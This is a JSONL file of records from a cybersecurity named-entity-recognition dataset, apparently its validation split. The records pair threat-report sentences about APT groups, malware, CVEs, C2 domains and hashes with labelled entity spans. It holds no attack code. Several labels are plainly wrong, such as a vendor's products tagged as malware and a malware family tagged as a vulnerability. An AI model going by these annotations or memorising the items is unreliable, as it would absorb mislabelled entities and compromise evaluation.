{"text": "Within this time period , we identified close to 300 samples belonging to this family ( all sample hashes are listed in the Appendix ) . NEODYMIUM used a backdoor detected by Windows Defender as Wingbird , whose characteristics closely match FinFisher , a government-grade commercial surveillance package . Brief Description : Dot file enabling the infection of the Gamaredon Pteranodon . Ashley Madison ’s parent company — Toronto - based Avid Life Media — filed a trademark infringement complaint in 2010 that succeeded in revealing a man named Dennis Bradshaw as the owner .", "spans": {"Organization: FinFisher": [[242, 251]], "Malware: Pteranodon": [[375, 385]], "Organization: Ashley Madison ’s parent company": [[388, 420]], "Organization: Avid Life Media": [[439, 454]], "Organization: Dennis Bradshaw": [[546, 561]]}, "info": {"id": "cyberner_stix_valid_000263", "source": "cyberner_stix_valid"}}
{"text": "It is basically SMS spam : many people still follow suspicious links , install software from third-party sources , and give permissions to apps without a second thought . In 2015 , the SecureWorks documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU analysis suggests is based in the People's Republic of China ( PRC ) . Users are advised to close unused ports , to secure ports and other internet-facing devices that are regularly open for system administrators ’ support . These frameworks are commonly delivered as part of traditional commodity malware , so infection chains can vary widely .", "spans": {"Organization: SecureWorks": [[185, 196]], "Organization: CTU": [[275, 278]]}, "info": {"id": "cyberner_stix_valid_000264", "source": "cyberner_stix_valid"}}
{"text": "] today During our investigation , we identified at least four major releases of the RAT . This migration activity was last observed in October 2016 . While their identities remain unknown , the attackers behind the IXESHE campaign demonstrated that they were both determined and capable . Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts .", "spans": {}, "info": {"id": "cyberner_stix_valid_000265", "source": "cyberner_stix_valid"}}
{"text": "TG-3390 : ctcb.blackcmd.com .", "spans": {"Indicator: ctcb.blackcmd.com": [[10, 27]]}, "info": {"id": "cyberner_stix_valid_000266", "source": "cyberner_stix_valid"}}
{"text": "The attack began with a web shell running on a vulnerable , publicly-facing server , from which the attackers gathered information about the network and propagated across the network . Given our increased confidence that Bahamut was responsible for targeting of Qatari labor rights advocates and its focus on the foreign policy institutions other Gulf states , Bahamut 's interests are seemingly too expansive to be limited one sponsor or customer .", "spans": {"Organization: labor rights advocates": [[269, 291]], "Organization: foreign policy institutions": [[313, 340]]}, "info": {"id": "cyberner_stix_valid_000267", "source": "cyberner_stix_valid"}}
{"text": "Investigation of this testing activity reveals multiple independent ties to Russia , CNIIHM , and a specific person in Moscow .", "spans": {"Organization: CNIIHM": [[85, 91]]}, "info": {"id": "cyberner_stix_valid_000268", "source": "cyberner_stix_valid"}}
{"text": "The primary difference between the CVE-2014-0515 metasploit module and this exploit is , obviously , the vulnerability .", "spans": {"Vulnerability: CVE-2014-0515": [[35, 48]]}, "info": {"id": "cyberner_stix_valid_000269", "source": "cyberner_stix_valid"}}
{"text": "Changes to Egypt ’s internal political climate are known to have affected Egyptian government relations with Hamas over the years .", "spans": {"Organization: Hamas": [[109, 114]]}, "info": {"id": "cyberner_stix_valid_000270", "source": "cyberner_stix_valid"}}
{"text": "While we know that the attackers used the Nidiran back door to steal information about the compromised organization , we do not know if Suckfly was successful in stealing other information .", "spans": {"Malware: Nidiran": [[42, 49]]}, "info": {"id": "cyberner_stix_valid_000271", "source": "cyberner_stix_valid"}}
{"text": "In all cases , the ads are used to convince users to install other apps from different developer accounts , but written by the same group . Recently , Falcon Intelligence observed new activity from MUSTANG PANDA , using a unique infection chain to target likely Mongolia-based victims . This is based on the use of the known APT16 domain rinpocheinfo.com , as well as overlaps in previously observed targeting and tactics , techniques and procedures ( TTPs ) . These are also highly targeted emails with ( relatively speaking ) convincing lures , so whoever is behind these is not to be ignored .", "spans": {"Organization: Falcon Intelligence": [[151, 170]], "Indicator: rinpocheinfo.com": [[338, 354]], "Organization: emails": [[492, 498]]}, "info": {"id": "cyberner_stix_valid_000272", "source": "cyberner_stix_valid"}}
{"text": "Recently , the ThreatLabZ research team came across a fake Netflix app , which turned out to be a new variant of SpyNote RAT ( Remote Access Trojan ) . In the last successful attack described in Silence: Moving into the darkside , dated April 2018 , the hackers siphoned off about $150 , 000 through ATMs in a single night . Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems .", "spans": {"Organization: ThreatLabZ": [[15, 25]], "System: fake Netflix app": [[54, 70]], "Malware: SpyNote RAT": [[113, 124]], "Malware: Carbanak": [[336, 344]], "Organization: banks": [[404, 409]], "Organization: payment systems": [[416, 431]]}, "info": {"id": "cyberner_stix_valid_000273", "source": "cyberner_stix_valid"}}
{"text": "This ZeroT executable communicated with the C&C domain www.kz-info.net and downloaded PlugX as well as an additional PCRat S-VULNAME/Gh0st Trojan which communicated with the www.ruvim.net C&C server .", "spans": {"Malware: ZeroT": [[5, 10]], "Indicator: www.kz-info.net": [[55, 70]], "Malware: PlugX": [[86, 91]], "Vulnerability: PCRat S-VULNAME/Gh0st": [[117, 138]], "Malware: Trojan": [[139, 145]], "Indicator: www.ruvim.net": [[174, 187]]}, "info": {"id": "cyberner_stix_valid_000274", "source": "cyberner_stix_valid"}}
{"text": "The threat actors have used the Baidu search engine , which is only available in Chinese , to conduct reconnaissance activities .", "spans": {}, "info": {"id": "cyberner_stix_valid_000275", "source": "cyberner_stix_valid"}}
{"text": "While not directly overlapping , this potential infrastructure link is interesting , as Vixen Panda has previously displayed TTPs similar to COMMENT PANDA , and has extensively targeted European entities . The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine .", "spans": {"Indicator: KopiLuwak": [[227, 236]]}, "info": {"id": "cyberner_stix_valid_000276", "source": "cyberner_stix_valid"}}
{"text": "Skygofree : Following in the footsteps of HackingTeam 16 JAN 2018 At the beginning of October 2017 , we discovered new Android spyware with several features previously unseen in the wild . In the past , countries such as Saudi Arabia , the UAE and Turkey have been a MuddyWater's main target , but the campaigns have also reached a much wider audience , making their way to victims in countries such as Belarus and Ukraine . They appear to focus on targeting individuals of interest to Iran who work in academic research , human rights , and media , with most victims having been located in Iran , the US , Israel , and the UK .", "spans": {"Malware: Skygofree": [[0, 9]], "Organization: HackingTeam": [[42, 53]], "System: Android": [[119, 126]]}, "info": {"id": "cyberner_stix_valid_000277", "source": "cyberner_stix_valid"}}
{"text": "Recently , we have come across another variant of this app portraying itself as TikTok Pro , but this is a full-fledged spyware with premium features to spy on victim with ease . EvilGnome's functionalities include desktop screenshots , file stealing , allowing capturing audio recording from the user’s microphone and the ability to download and execute further modules . Strings within this sample associated with the malware ’s operations are encoded using a single-byte XOR encoding .", "spans": {"System: TikTok Pro": [[80, 90]]}, "info": {"id": "cyberner_stix_valid_000278", "source": "cyberner_stix_valid"}}
{"text": "KeyBoy provides basic backdoor functionality , allowing the operators to select from various capabilities used to surveil and steal information from the victim machine . In other words , the attackers attracted our attention by attempting to exploit Kaspersky Lab products .", "spans": {"Vulnerability: exploit": [[242, 249]], "Malware: Kaspersky Lab products": [[250, 272]]}, "info": {"id": "cyberner_stix_valid_000279", "source": "cyberner_stix_valid"}}
{"text": "CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption . FIF is notable for its links to the Lashkar-e-Taiba ( LeT ) terrorist organization , which has committed mass-casualty attacks in India in support of establishing Pakistani control over the disputed Jammu and Kashmir border region .", "spans": {"Vulnerability: CVE-2018-0798": [[0, 13]], "Organization: Lashkar-e-Taiba": [[170, 185]], "Organization: LeT": [[188, 191]]}, "info": {"id": "cyberner_stix_valid_000280", "source": "cyberner_stix_valid"}}
{"text": "com.advantage.RaiffeisenBank pl.bzwbk.ibiznes24 pl.bzwbk.bzwbk24 pl.bzwbk.mobile.tab.bzwbk24 com.comarch.mobile.investment com.android.vending com.snapchat.android jp.naver.line.android com.viber.voip com.gettaxi.android com.whatsapp com.tencent.mm com.skype.raider com.ubercab com.paypal.android.p2pmobile The group primarily uses Truvasys , a first-stage malware that has been in circulation for several years . The new wave dates back to the end of November 2019 and was first analyzed by Vitali Kremez . The contents found in secure[.]66[.]to often lead to zhu[.]vn , which is Hack520 ’s domain for hosting his own private blog .", "spans": {}, "info": {"id": "cyberner_stix_valid_000281", "source": "cyberner_stix_valid"}}
{"text": "This isn’t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier . The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) .", "spans": {"Malware: it": [[26, 28]], "Indicator: Zawgyi_Keyboard_L.zip": [[189, 210]], "Indicator: setup.exe": [[234, 243]], "Malware: Elise": [[304, 309]], "Indicator: wincex.dll": [[312, 322]], "Indicator: a42c966e26f3577534d03248551232f3": [[327, 359]], "Malware: Backdoor.Win32.Agent.delp": [[374, 399]]}, "info": {"id": "cyberner_stix_valid_000282", "source": "cyberner_stix_valid"}}
{"text": "It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations . RCS Galileo platform .", "spans": {}, "info": {"id": "cyberner_stix_valid_000283", "source": "cyberner_stix_valid"}}
{"text": "In 2013 , there was evidence of cooperation ( most probably on a commercial basis ) between different groups of virus writers . It's possible TG-3390 used a waterhole to infect data center employees . This article focuses on the technical details of this new ShadowPad variant . Protecting your information and systems from every vantage point , including your networks , devices , applications , transmissions , privileges , and storage is critical , as is regularly training your staff on the latest cyber threats , trends , and ransomware phishing attacks .", "spans": {"Organization: data center employees": [[177, 198]], "Malware: ShadowPad": [[259, 268]]}, "info": {"id": "cyberner_stix_valid_000284", "source": "cyberner_stix_valid"}}
{"text": "The command and control domains were different , and these samples used unique decoy documents to target their victims .", "spans": {}, "info": {"id": "cyberner_stix_valid_000285", "source": "cyberner_stix_valid"}}
{"text": "Firmware is low-level code deep in an operating system that often has high access privileges , so it 's critical that it 's verified and contains no software vulnerabilities . APT10's unprecedented campaign against MSPs , alleged to have included some of the largest MSPs in the world , in order to conduct secondary attacks against their clients , grants the Chinese state the ability to potentially access the networks of hundreds (if not thousands) of corporations around the world . Minzen : 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2 .", "spans": {"Organization: MSPs": [[215, 219]], "Malware: Minzen": [[487, 493]], "Indicator: 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2": [[496, 560]]}, "info": {"id": "cyberner_stix_valid_000286", "source": "cyberner_stix_valid"}}
{"text": "Filename : attachedTemplate.dotm MD5 : 018611b879b2bbd886e86b62484494da Filename : templates.dotm MD5 : 2a794b55b839b3237482098957877326 .", "spans": {"Indicator: attachedTemplate.dotm": [[11, 32]], "Indicator: 018611b879b2bbd886e86b62484494da": [[39, 71]], "Indicator: templates.dotm": [[83, 97]], "Indicator: 2a794b55b839b3237482098957877326": [[104, 136]]}, "info": {"id": "cyberner_stix_valid_000287", "source": "cyberner_stix_valid"}}
{"text": "In comparison , XENOTIME was defined based on principles of infrastructure ( compromised third-party infrastructure and various networks associated with several Russian research institutions ) , capabilities ( publicly- and commercially-available tools with varying levels of customization ) and targeting ( an issue not meant for discussion in this blog ) .", "spans": {}, "info": {"id": "cyberner_stix_valid_000288", "source": "cyberner_stix_valid"}}
{"text": "After gaining access to a target network in one intrusion analyzed by CTU researchers , TG-3390 actors identified and exfiltrated data for specific projects run by the target organization , indicating that they successfully obtained the information they sought .", "spans": {"Organization: CTU": [[70, 73]]}, "info": {"id": "cyberner_stix_valid_000289", "source": "cyberner_stix_valid"}}
{"text": "The PDF lists dates of birth , gender , passport numbers , and names . We will detail how the C&C infrastructure and tools used by hacker group Hidden Lynx during its VOHO campaign ( 2012 ) , excellently documented by Symantec researchers last September , overlap with tools used in other high profile operations during the past few years . The sheer number of APT1 IP addresses concentrated in these Shanghai ranges , coupled with Simplified Chinese keyboard layout settings on APT1 ’s attack systems , betrays the true location and language of the operators . Ransomware - as - a - service is a relatively new version of these commodity groups , such as DarkSide , known for the cyber attack in 2021 that disrupted the Colonial oil pipeline and made gas more expensive for thousands of U.S. consumers .", "spans": {"Organization: Symantec": [[218, 226]]}, "info": {"id": "cyberner_stix_valid_000290", "source": "cyberner_stix_valid"}}
{"text": "for Android with Extensive Surveillance Capabilities August 20 , 2018 No operating system is safe from malware , as cyber criminals will always want to steal , spy or tamper with your data . SectorJ04 group conducted hacking activities targeting financial institutions located in India and Hong Kong around April 2019 . If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation .", "spans": {"System: Android": [[4, 11]], "Organization: financial": [[246, 255]], "Malware: Carbanak": [[352, 360]], "Vulnerability: exploit": [[373, 380]], "System: Windows": [[406, 413], [419, 426], [441, 448], [457, 464], [479, 486], [491, 498], [507, 514]], "Vulnerability: CVE-2013-3660": [[529, 542]]}, "info": {"id": "cyberner_stix_valid_000291", "source": "cyberner_stix_valid"}}
{"text": "NEW CYBER ESPIONAGE CAMPAIGNS TARGETING PALESTINIANS Over the last several months , the Cybereason Nocturnus team has been tracking recent espionage campaigns targeting the Middle East .", "spans": {"Organization: Cybereason Nocturnus": [[88, 108]]}, "info": {"id": "cyberner_stix_valid_000292", "source": "cyberner_stix_valid"}}
{"text": "In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China .", "spans": {"Vulnerability: CVE-2011-3544": [[38, 51]], "Vulnerability: CVE-2010-0738": [[146, 159]], "Organization: gaming organizations": [[351, 371]]}, "info": {"id": "cyberner_stix_valid_000293", "source": "cyberner_stix_valid"}}
{"text": "The developer name used , GAS Brazil , suggests the criminals behind the app targeted Brazilian users . In May 2018 , campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: CVE-2017-11882 , a remote code execution bug in Microsoft Office that is commonly observed being leveraged in malicious documents used in commodity malware distribution . The naming scheme used by Novetta for the malware identified during Operation Blockbuster consists of at least two identifiers which each identifier coming from the International Civil Aviation Organization ( ICAO ) 's phonetic alphabet ,2 commonly referred to as the NATO phonetic alphabet .", "spans": {"Vulnerability: CVE-2017-11882": [[213, 227]], "Organization: Novetta": [[410, 417]], "Organization: International Civil Aviation Organization": [[549, 590]], "Organization: ICAO": [[593, 597]]}, "info": {"id": "cyberner_stix_valid_000294", "source": "cyberner_stix_valid"}}
{"text": "These malware samples leverage the user agent string “ OPAERA ” , the same one identified in the Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA blog .", "spans": {"Malware: KASPERAGENT": [[139, 150]], "Malware: MICROPSIA": [[155, 164]]}, "info": {"id": "cyberner_stix_valid_000295", "source": "cyberner_stix_valid"}}
{"text": "TrickMo Calls pushTAN The pushTAN method is a hurdle for malware apps that may reside on the same device , and it ’ s particularly challenging for mobile malware due to Android ’ s application sandbox . Russian cyber espionage actors use zero-day exploits in addition to less complex measures . When we first discovered the OilRig attack campaign in May 2016 , we believed at the time it was a unique attack campaign likely operated by a known , existing threat group .", "spans": {"Malware: TrickMo": [[0, 7]], "System: Android": [[169, 176]]}, "info": {"id": "cyberner_stix_valid_000296", "source": "cyberner_stix_valid"}}
{"text": "As an example , in the two images below , we can see the encrypted and decrypted shared preferences file , which is encrypted using the java “ PBEWithMD5AndDES ” algorithm . The toolset includes reams of documentation explaining how the cyber weapons work , as well as details about their use in highly classified intelligence operations abroad . These incidents involved spear-phishing attacks , which characteristic of HELIX KITTEN , included emails containing malicious PowerShell in their macros that connects to known C2 infrastructure .", "spans": {"Malware: PowerShell": [[473, 483]]}, "info": {"id": "cyberner_stix_valid_000297", "source": "cyberner_stix_valid"}}
{"text": "Kaspersky Lab reported the Trojan to Google , and it has now been removed from the store . With this level of access , the gang has been able to pull off a clever trick by automating the rollback of ATM transactions . In this example , the webpage that the attacker is monitoring is booking.com ( more specifically , the page containing the card details ) . They have named it Industroyer – the biggest threat to Industrial Control Systems ( ICS ) since Stuxnet .", "spans": {"Organization: Kaspersky Lab": [[0, 13]], "Organization: Google": [[37, 43]], "Indicator: booking.com": [[283, 294]], "Malware: Industroyer": [[377, 388]], "System: Industrial Control Systems ( ICS": [[413, 445]]}, "info": {"id": "cyberner_stix_valid_000298", "source": "cyberner_stix_valid"}}
{"text": "Pivoting on specific file attributes and infrastructure indicators , Unit 42 was able to identify and correlate additional attacker activity and can now provide specific details on a targeted WINDSHIFT attack as it unfolded at a Middle Eastern government agency . The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 .", "spans": {"Organization: Unit 42": [[69, 76]], "Organization: government agency": [[244, 261]], "Malware: JHUHUGIT": [[268, 276]], "Vulnerability: zero-day": [[379, 387]], "Vulnerability: CVE-2015-2590": [[390, 403]]}, "info": {"id": "cyberner_stix_valid_000299", "source": "cyberner_stix_valid"}}
{"text": "In this instance , the C2 communication implemented by the Micropsia backdoor also used specific names for different C2 commands .", "spans": {"Malware: Micropsia backdoor": [[59, 77]]}, "info": {"id": "cyberner_stix_valid_000300", "source": "cyberner_stix_valid"}}
{"text": "Providing the app has registered an intent to process particular events from the system , and one of said events occurs , HenBox is effectively brought to life through external stimulus from another app on the system broadcasting a request , or the system itself broadcasting a particular event has occurred . This provides another connection between the targeting of the cryptocurrency organizations and video game targeting . In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations , and characterized APT28 's activity as aligning with the Russian government 's strategic intelligence requirements .", "spans": {"Organization: cryptocurrency organizations": [[372, 400]], "Organization: video game targeting": [[405, 425]], "Organization: FireEye": [[446, 453]], "Organization: Russian government": [[581, 599]]}, "info": {"id": "cyberner_stix_valid_000301", "source": "cyberner_stix_valid"}}
{"text": "The coding style suggests that the cybercriminals behind this campaign are amateurs . Starting in February 2018 , Palo Alto Networks Unit 42 identified a not just goto . If passed , it would require U.S. financial institutions hit with ransomware to notify the Director of the Treasury Departments Financial Crimes Enforcement Network with details of the attack and the ransom demand .", "spans": {"Organization: Palo Alto Networks Unit 42": [[114, 140]], "Organization: U.S. financial institutions": [[199, 226]], "Malware: ransomware": [[236, 246]], "Organization: Director of the Treasury Departments Financial Crimes Enforcement Network": [[261, 334]]}, "info": {"id": "cyberner_stix_valid_000302", "source": "cyberner_stix_valid"}}
{"text": "It can also identify open ports , collect web banners , and download secondary files .", "spans": {}, "info": {"id": "cyberner_stix_valid_000303", "source": "cyberner_stix_valid"}}
{"text": "Security Without Borders has recently published an analysis of this family , independently , through their blog . To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer . This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia .", "spans": {"Organization: Security Without Borders": [[0, 24]], "Vulnerability: Carbanak": [[185, 193]], "Organization: defense entities": [[385, 401]]}, "info": {"id": "cyberner_stix_valid_000304", "source": "cyberner_stix_valid"}}
{"text": "In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves . Many of the tools they use now feature new behaviors , including a change in the ACT they maintain a foothold in the targeted network .", "spans": {"Vulnerability: zero-day exploits": [[37, 54], [289, 306], [358, 375]]}, "info": {"id": "cyberner_stix_valid_000305", "source": "cyberner_stix_valid"}}
{"text": "Scarlet Mimic primarily deploys spear-phishing e-mails to infect its targets , but was also responsible for a watering hole attack in 2013 . According to the German press , the intruders used the Winnti family of malware as their main implant , giving them persistent access to the conglomerate 's network as early as February 2016 .", "spans": {"Malware: Winnti family of malware": [[196, 220]]}, "info": {"id": "cyberner_stix_valid_000306", "source": "cyberner_stix_valid"}}
{"text": "By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks .", "spans": {"Malware: SWAnalytics": [[25, 36]]}, "info": {"id": "cyberner_stix_valid_000307", "source": "cyberner_stix_valid"}}
{"text": "The primary source of data used in this analysis is Palo Alto Networks WildFire , which analyzes malware used in attacks across the world . COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites .", "spans": {"Organization: Palo Alto Networks WildFire": [[52, 79]], "Organization: telecommunications": [[186, 204]], "Organization: government": [[207, 217]], "Organization: defense": [[220, 227]], "Organization: oil": [[230, 233]], "Organization: financial services organizations": [[240, 272]], "Organization: individual victims": [[331, 349]], "Organization: social media": [[358, 370]]}, "info": {"id": "cyberner_stix_valid_000308", "source": "cyberner_stix_valid"}}
{"text": "However , the actual timeline of the creation of different variants is unclear . After successfully infecting one of the computers and gaining initial access to the system , the attackers perform reconnaissance of the local network in order to gain domain administrator privileges and eventually consolidate control over the network . IRONHALO : AcroRd32Info.exe.exe a8ccb2fc5fec1b89f778d93096f8dd65 . This activity is followed quickly by additional access and persistent mechanisms .", "spans": {"Malware: IRONHALO": [[335, 343]], "Indicator: AcroRd32Info.exe.exe": [[346, 366]], "Indicator: a8ccb2fc5fec1b89f778d93096f8dd65": [[367, 399]]}, "info": {"id": "cyberner_stix_valid_000309", "source": "cyberner_stix_valid"}}
{"text": "Port 6205 : Gmail extraction service . activity originated from three separate IP addresses , all located in Chengdu , China . With regards to decoy content themes , this campaign resembles previous campaigns reported in blogs by Vectra , Unit 42 , and Talos . Education accounts for a huge proportion of known Vice Society attacks .", "spans": {"System: Gmail": [[12, 17]], "Organization: Unit 42": [[239, 246]], "Organization: Talos": [[253, 258]]}, "info": {"id": "cyberner_stix_valid_000310", "source": "cyberner_stix_valid"}}
{"text": "KASPERAGENT is Microsoft Windows malware used in efforts targeting users in the United States , Israel , Palestinian Territories , and Egypt since July 2015 .", "spans": {"Malware: KASPERAGENT": [[0, 11]], "Organization: Microsoft": [[15, 24]], "System: Windows": [[25, 32]]}, "info": {"id": "cyberner_stix_valid_000311", "source": "cyberner_stix_valid"}}
{"text": "APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel files to deliver their initial exploits . Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments .", "spans": {"Malware: Microsoft Excel files": [[57, 78]], "Malware: maldoc": [[155, 161]], "Organization: ICS": [[186, 189]], "Organization: OT staff": [[193, 201]]}, "info": {"id": "cyberner_stix_valid_000312", "source": "cyberner_stix_valid"}}
{"text": "FireEye has detected more than 20 cyber threat groups suspected to be sponsored by at least four other nation-states attempting to gain access to targets in the energy sector that could have been used to cause disruptions . The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People 's Republics .", "spans": {"Organization: FireEye": [[0, 7]], "Organization: anti-government separatists": [[336, 363]]}, "info": {"id": "cyberner_stix_valid_000313", "source": "cyberner_stix_valid"}}
{"text": "Another attack group , Earworm ( aka Zebrocy ) , has been active since at least May 2016 and is involved in what appears to be intelligence gathering operations against military targets in Europe , Central Asia , and Eastern Asia .", "spans": {}, "info": {"id": "cyberner_stix_valid_000314", "source": "cyberner_stix_valid"}}
{"text": "] 133 ” as a main C2 address , and there is only one domain that is hosted on this dedicated server – iliageram [ . It's coincident that both 'darkhydrus' APT group name and ‘Williams’ user name in PDB path found in this Twitter user . ScarCruft tools : 032ed0cd234f73865d55103bf4ceaa22 Downloader .", "spans": {"Organization: Twitter user": [[221, 233]], "Indicator: 032ed0cd234f73865d55103bf4ceaa22": [[254, 286]]}, "info": {"id": "cyberner_stix_valid_000315", "source": "cyberner_stix_valid"}}
{"text": "Lookout customers are protected against this threat and additionally we have included a list of IOCs at the end of this report . cyberattacks against high-value targets in Ukraine in December 2015 and December 2016 . The content of the ZIP attachment it displayed in its UI was not the one it extracted! This sample challenges gateways . Surprisingly enough , it does not take very long to get some information about Hack520 : someone with this handle runs a blog and a Twitter account ( with a handle close to Hack520 ) that is also directly linked to the blog .", "spans": {"Organization: Lookout": [[0, 7]]}, "info": {"id": "cyberner_stix_valid_000316", "source": "cyberner_stix_valid"}}
{"text": "Emotet is a type of general-purpose malware that evolved from a well-known banking Trojan , \" Cridex \" , which was first discovered in 2014 . Some hackers even went onto use the Cisco exploits in the wild .", "spans": {"Organization: Cisco": [[178, 183]], "Vulnerability: exploits": [[184, 192]]}, "info": {"id": "cyberner_stix_valid_000317", "source": "cyberner_stix_valid"}}
{"text": "Mandiant 's APT1 report was the first to change the game , and paved the way for private security companies to expose advanced threat actors en masse . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e. , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 .", "spans": {"Organization: Mandiant": [[0, 8]], "Organization: private security companies": [[81, 107]], "Indicator: BalkanDoor": [[185, 195]], "Vulnerability: exploit": [[344, 351]], "Vulnerability: CVE-2018-20250": [[381, 395]]}, "info": {"id": "cyberner_stix_valid_000318", "source": "cyberner_stix_valid"}}
{"text": "In 2013 , the group deployed a watering hole attack , also known as a strategic web compromise to infect victims with their backdoor . Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers .", "spans": {"Organization: Symantec": [[135, 143]], "Organization: customers": [[215, 224]]}, "info": {"id": "cyberner_stix_valid_000319", "source": "cyberner_stix_valid"}}
{"text": "Upon decryption , we can see that the response from the server is a JSON object of EventBot ’ s configuration , which contains C2 URLs and a targeted applications list . The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft . Many of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES .", "spans": {"Malware: EventBot": [[83, 91]], "Malware: Bemstour": [[196, 204]], "Organization: Symantec": [[213, 221]], "Malware: AES": [[469, 472]]}, "info": {"id": "cyberner_stix_valid_000320", "source": "cyberner_stix_valid"}}
{"text": "Use of a shared hosting service to distribute malware is highly flexible and low cost for the threat actors . Recently we were able to observe these actors making modifications to their Clayslide delivery documents in an attempt to evade antivirus detection . Ssdeep : 24576:vmoO8itbaZiW+qJnmCcpv5lKbbJAiUqKXM : OoZwxVvfoaPu . The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted , malformed file .", "spans": {"Organization: Talos": [[347, 352]], "Organization: Open Babel": [[383, 393]]}, "info": {"id": "cyberner_stix_valid_000321", "source": "cyberner_stix_valid"}}
{"text": "For instance , the earliest known CozyDuke version utilized a feature of the Microsoft Visual C++ compiler known as run-time error checking .", "spans": {"Malware: CozyDuke": [[34, 42]], "Organization: Microsoft": [[77, 86]]}, "info": {"id": "cyberner_stix_valid_000322", "source": "cyberner_stix_valid"}}
{"text": "More technically inclined people can detect infections by seeing if a device connects to a control server located at app.blinkingcamera.com . The most common communication mode for a RAT is to act as a client to a remote server . NetWeird ( Trojan.Netweird.B ) : A commodity Trojan which can open a backdoor and steal information from the compromised computer . PIEHOP utilizes LIGHTWORK to execute the IEC-104 commands \" ON ” or \" OFF \" on the remote system and immediately deletes the executable after issuing the commands .", "spans": {"Malware: NetWeird": [[230, 238]], "Malware: Trojan.Netweird.B": [[241, 258]], "Malware: Trojan": [[275, 281]]}, "info": {"id": "cyberner_stix_valid_000323", "source": "cyberner_stix_valid"}}
{"text": "CosmicDuke ’s information stealing functionality includes : Keylogging , Taking screenshots , Stealing clipboard contents , Stealing user files with file extensions that match a predefined list , Exporting the users cryptographic certificates including private keys , Collecting user credentials , including passwords , for a variety of popular chat and email programs as well as from web browsers CosmicDuke may use HTTP , HTTPS , FTP or WebDav to exfiltrate the collected data to a hardcoded C&C server .", "spans": {"Malware: CosmicDuke": [[0, 10], [398, 408]]}, "info": {"id": "cyberner_stix_valid_000324", "source": "cyberner_stix_valid"}}
{"text": "The source process changes the registers in the target process so that PC register points directly to the shellcode . Potao is another example of targeted espionage malware , a so-called APT , to use the popular buzzword , although technically the malware is not particularly advanced or sophisticated . APT17 : 69.80.72.165 . It also sends collected browser data to another script by sending a POST request to “ hxxp://[c2_hostname]/groups / count / write.php ” .", "spans": {"Indicator: 69.80.72.165": [[312, 324]]}, "info": {"id": "cyberner_stix_valid_000325", "source": "cyberner_stix_valid"}}
{"text": "The actor sends an email to the secondary email account with the unique system identifier as a subject with a secondary payload attached with a filename of txt .", "spans": {}, "info": {"id": "cyberner_stix_valid_000326", "source": "cyberner_stix_valid"}}
{"text": "As wonderfully described in a recent public posting , FireEye adheres to a naming convention based upon extensive data collection and activity comparison , designed to yield the identification of a discrete , identifiable entity responsible for a given collection of activity .", "spans": {"Organization: FireEye": [[54, 61]]}, "info": {"id": "cyberner_stix_valid_000327", "source": "cyberner_stix_valid"}}
{"text": "In particular , we will focus on the samples SHA-1 AA0FA4584768CE9E16D67D8C529233E99FF1BBF0 and 48BC113EC8BA20B8B80CD5D4DA92051A19D1032B . CapabilitiesFormBook is a data stealer , but not a full-fledged banker .", "spans": {"Organization: CapabilitiesFormBook": [[139, 159]], "Organization: banker": [[203, 209]]}, "info": {"id": "cyberner_stix_valid_000328", "source": "cyberner_stix_valid"}}
{"text": "Lateral movement to other machines on the network .", "spans": {}, "info": {"id": "cyberner_stix_valid_000329", "source": "cyberner_stix_valid"}}
